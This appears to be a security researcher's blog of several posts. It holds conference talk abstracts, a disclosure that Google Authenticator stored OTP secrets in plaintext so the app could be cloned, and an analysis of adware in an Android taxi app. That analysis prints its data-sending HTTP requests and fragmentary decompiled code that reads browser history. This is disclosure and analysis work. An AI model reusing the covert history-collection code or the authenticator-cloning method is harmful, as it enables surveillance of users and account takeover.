[HITB GSEC] Understanding Your Opponent: Attack Profiling

This talk will be based on real world cases in Asia and Korea. We will talk about real approaches for incident response in CERTs and also present the common points and connections between different malware incidents in Asia.

Through various incident response and malware analysis, we have found attackers were using similar malware and attack methods for several incidents. The analysis for common points and relations of attacks can help us to better understand the purpose and tactics of attackers for more effective response. Attack Profiling is a valuable method for figuring out the motives of an attacker, sharing threat intelligence for incidents and preparing response methods for expected future incidents.

We have performed analysis against incidents targeting government agencies, media outlets, broadcasting services, critical infrastructure and the financial sector and in this presentation, we will introduce the approach and methods used for attack profiling.


1. Recent Cases

2. Attack Profiling Methods and Factors for Analysis
– Approaches for Profiling
– Tactics, Code and IOC

3. Attack Profiling in Real World Incident Cases
– Case 1 : (Malware targeted to Financial Industry in Asia)
– Case 2 : (APT Incident Case 1)
– Case 3 : (APT Incident Case 2)

4. Conclusion

We hope through this session, attendees will better understand how to analyze an attack and how to figure out it’s possible relations to other incidents.


Mobile Banking integrate with Apple Touch ID

Large scale banks like Bank of America, Chase made a connection with Apple Pay. But, banks in several countries were not worked with Apple Pay directly; they integrated with Apple Touch ID, St George Bank(Australia), Tangerine(Canada), Turkiye Bankasi(Turkey).

They only added the function, authenticated by fingerprint via Touch ID. So, customers can login into mobile banking with their fingerprint instead of the traditional identification, password and PIN.

Banks can develop the fingerprint authentication using Apple’s API. And the biometric data is stored into the customer’s device.

123          234

Video : https://www.youtube.com/watch?v=VzLtxpSEAj4

Make a secure mobile payment – HITCON 2014

I made a presentation at HITCON 2014 in Taiwan, the title is “Make a secure mobile payment”.

File : E2_06_Yongjun Park – Make a secure mobile payment


Recently, many kinds of mobile payment have launched, and it has got a large share of payment transactions in the world. As we know that, a breach of payment is highly dangerous because it could be exploited to steal real money, directly.

I have found diverse flows and vulnerabilities during security testing. Some of them could be used to acquire payment data and to change transactions. I will talk about threats of mobile payment and cases of vulnerability. Also, I am going to share how to test the security of mobile payment.

[Google Authenticator] Account and Key plaintexts stored in a file

[Google Authenticator] Account and Key plaintexts are stored in a file (May 22, 2012)

I found out a security issue at the Google authenticator in May, 2012. I sent a paper about the details of issue to Google security team, but, I didn’t get a response from them. The authenticator was applied upgrade last year, however, I have no idea whether or not the issue was changed. Anyway I post it before dumping it a behind of memory.

Google provides the 2-step verification to make their service more secure. A user can install and use the Google’s OTP(One Time Passwords) app on their Smartphone. But, I have analyzed a authenticator on Android, I figure out a security issue that can be used to make a clone authenticator on another Smartphone.

When a user try to register their Smartphone to use the authenticator, a user have to input their account and, key or scan QR code. And then, the authenticator it starting to create one time password. Now a user can authenticate with Google services through a one time credential.


< Add account >

The authenticator provides two selections to be initialized, ‘Scan bar-code’ and ‘Manually add account’. But if you choose anything, account and key are stored in a file. But the problem is that the user account and key are stored in a file as a plaintext

Stored file is sqlite and the file path is


As you can see the below, the email  field is a user account and the secret field is a key for the authenticator. The secret are looks encrypted, but it’s not a matter to make a clone authenticator.


< An example of stored key and secret >

If the file is copied or secrets and keys are duplicated into the another Smartphone’ authenticator, now we have a clone authenticator. The duplicated authenticators are creating a same one time password at the same time, and it can be used to authenticate the Google’s services.

I checked that the authenticator is verifying the device with phone number, Serial or IMEI, but device verification were not applied and it’s not affected the authenticator.


< The clone OTP >

The suggestions for this issue

  1. Encrypt account and key files
  2. Verify a device when the app executed to check it is a valid device or not or include a device serial into the one time password creation process
  3. Using more secure space like SIM, Turst Zone to prevent from the malicious access(In Korea, OTP apps for banks and financial sector are stored and executed in the SIM card)

User Activities Leakage with Free App

The android free app is transferring the device conditions and user activities without the user agreement. An adware included the free app is collecting the internet access data and launched app history on the installed device.

Free app: National Call Taxi – 전국 콜텍시(Korean)
Google Play: https://play.google.com/store/apps/details?id=kr.baccharis.callTaxi

The name of launched app and accessed URL list were sent to the outside server when user execute an app or connect to web with a mobile browser during the ‘National Call Taxi’ app launched or  in background. The malicious code is NOT a part of main source of the app, but it was included the adware module of app for profit.

The malicious data includes internet access URL, access time, applied rooting, WiFi status and device serial number (Not a real UUID, randomly generated).

[Sending Packet(URL Access)]

POST /servlet/Navvy.mawrite3 HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 208User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)Host: ma01.mediachannel.co.kr

Connection: Keep-Alive

Accept-Encoding: gzip


[Sending Packet(App Execution)]

POST /servlet/Navvy.mawrite3 HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 233User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)Host: ma01.mediachannel.co.kr

Connection: Keep-Alive

Accept-Encoding: gzip


[Sending Information]

–  Malicious App Version and Name
–  Serial Number(Generated random UUID)
–  Type : app(app execution) or web(web access)
–  Wifi and Rooting status
–  Executed App Name or Access URL

I have decompiled the malicious app and reviews the code of malicious functions.

[UUID Generation]

private String w(){

String str = "";



str = <b>UUID.randomUUID().toString();</b>

new StringBuilder("CreateSerial : ").append(str).toString();


label33: return str;


catch (Exception localException)


break label33;



[Browser History Access]

unregisterReceiver(this.s);stopSelf();Intent localIntent = new Intent(this, revRankey.class);

localIntent.putExtra("appwebCollect", 4500);


PendingIntent localPendingIntent = PendingIntent.getBroadcast(this, 0, localIntent, 0);

g.g.set(2, 10000L, localPendingIntent);

if (localObject4 == null)




<b>Cursor localCursor1 = g.e.query(Browser.BOOKMARKS_URI, Browser.HISTORY_PROJECTION, "date > " + g.i, null, "date");</b>

localObject4 = localCursor1;




localObject5 = "";

if (!((Cursor)localObject4).isBeforeFirst())


if (localObject1 == null)


boolean bool1 = localObject1.contentEquals("0");

if (!bool1)

break label509;

if (localObject4 == null)

Some adware are collecting the user behavior and internet access history data. And the advertising companies extract the worth from the data for their marketing. I guess that the web accessing and app launching data of the malicious app would be used for the similar purpose. But, WiFi status and Rooting conditions are able to use breaking into the device. I already posted the issue with Facebook, warning the another app include the adware could be exposed same security issue

South Korea Cyberterror on March 20th – News –

***Updated on march 26th***


South Korean Attack & Malware Analysis

South Korean Banks, Media Companies Targeted by Destructive Malware


Wowhacker Report


NProtect Report


Each report are continuingly updating, Korean reports have more detail and correct information. I’ll keep updating.